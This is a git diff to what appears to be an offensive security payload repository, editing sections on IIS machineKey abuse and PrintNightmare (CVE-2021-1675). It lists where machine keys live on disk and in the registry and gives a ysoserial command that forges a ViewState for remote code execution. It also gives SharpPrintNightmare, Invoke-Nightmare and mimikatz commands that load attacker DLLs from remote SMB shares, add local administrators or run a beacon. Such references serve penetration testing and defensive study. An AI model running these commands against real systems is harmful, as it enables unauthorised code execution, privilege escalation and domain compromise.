diff --git a/API Key Leaks/README.md b/API Key Leaks/README.md index 0bf5e25..b4dd55b 100644 --- a/API Key Leaks/README.md +++ b/API Key Leaks/README.md @@ -17,7 +17,7 @@ - [Twitter Bearer Token](#twitter-bearer-token) - [Gitlab Personal Access Token](#gitlab-personal-access-token) - [HockeyApp API Token](#hockeyapp-api-token) - - [Auth Bypass using pre-published Machine Key](#auth-bypass-using-pre-published-machine-key) + - [IIS Machine Keys](#iis-machine-keys) - [Mapbox API Token](#Mapbox-API-Token) @@ -99,11 +99,14 @@ curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hoc ``` -### Auth Bypass using pre-published Machine Key +### IIS Machine Keys -> By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token +> That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification. -That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification. +Requirements +* machineKey **validationKey** and **decryptionKey** +* __VIEWSTATEGENERATOR cookies +* __VIEWSTATE cookies Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication. @@ -111,8 +114,41 @@ Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/s ``` +Common locations of **web.config** / **machine.config** +* 32-bit + * C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config + * C:\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.config +* 64-bit + * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.config + * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\machine.config +* in registry when **AutoGenerate** is enabled (extract with https://gist.github.com/irsdl/36e78f62b98f879ba36f72ce4fda73ab) + * HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\4.0.30319.0\AutoGenKeyV4 + * HKEY_CURRENT_USER\Software\Microsoft\ASP.NET\2.0.50727.0\AutoGenKey + Exploit with [Blacklist3r](https://github.com/NotSoSecure/Blacklist3r) +#### Identify known machine key + +```powershell +AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata --purpose=viewstate --modifier= –macdecode +``` + + +#### Generate ViewState for RCE + +**NOTE**: In Burp you should **URL Encode Key Characters** for your payload. + +```powershell +ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "cmd.exe /c nslookup " --decryptionalg="AES" --generator=ABABABAB decryptionkey="" --validationalg="SHA1" --validationkey="" +``` + + +#### Edit cookies with the machine key + +If you have the machineKey but the viewstate is disabled. + +ASP.net Forms Authentication Cookies : https://github.com/liquidsec/aspnetCryptTools + ```powershell # decrypt cookie $ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes @@ -121,7 +157,6 @@ $ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX $ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt ``` - ### Mapbox API Token A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is `sk`, jackpot. If it's `pk` or `tk`, it's not worth your time. ``` diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f02ecaf..fec15ea 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -595,25 +595,25 @@ Requirements: # https://github.com/cube0x0/CVE-2021-1675 - require a modified Impacket: https://github.com/cube0x0/impacket python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll' python3 ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll' - -# LPE +## LPE SharpPrintNightmare.exe C:\addCube.dll - -# RCE using existing context +## RCE using existing context SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20' - -# RCE using runas /netonly +## RCE using runas /netonly SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123 -# LPE only (PS1 + DLL) - https://github.com/calebstewart/CVE-2021-1675 +# https://github.com/calebstewart/CVE-2021-1675 +## LPE only (PS1 + DLL) Import-Module .\cve-2021-1675.ps1 Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default Invoke-Nightmare -DriverName "Dementor" -NewUser "d3m3nt0r" -NewPassword "AzkabanUnleashed123*" Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll" -# Original POC https://github.com/afwu/PrintNightmare -.\PrintNightmare.exe dc_ip path_to_exp user_name password -.\PrintNightmare.exe 192.168.5.129 \\192.168.5.197\test\MyExploit.dll user2 test123 +# Mimikatz - https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210705 +## LPE +misc::printnightmare /server:DC01 /library:C:\Users\user1\Documents\mimispool.dll +## RCE +misc::printnightmare /server:CASTLE /library:\\10.0.2.12\smb\beacon.dll /authdomain:LAB /authuser:Username /authpassword:Password01 /try:50 ``` **NOTE**: The payload can be hosted on Impacket SMB server since [PR #1109](https://github.com/SecureAuthCorp/impacket/pull/1109) .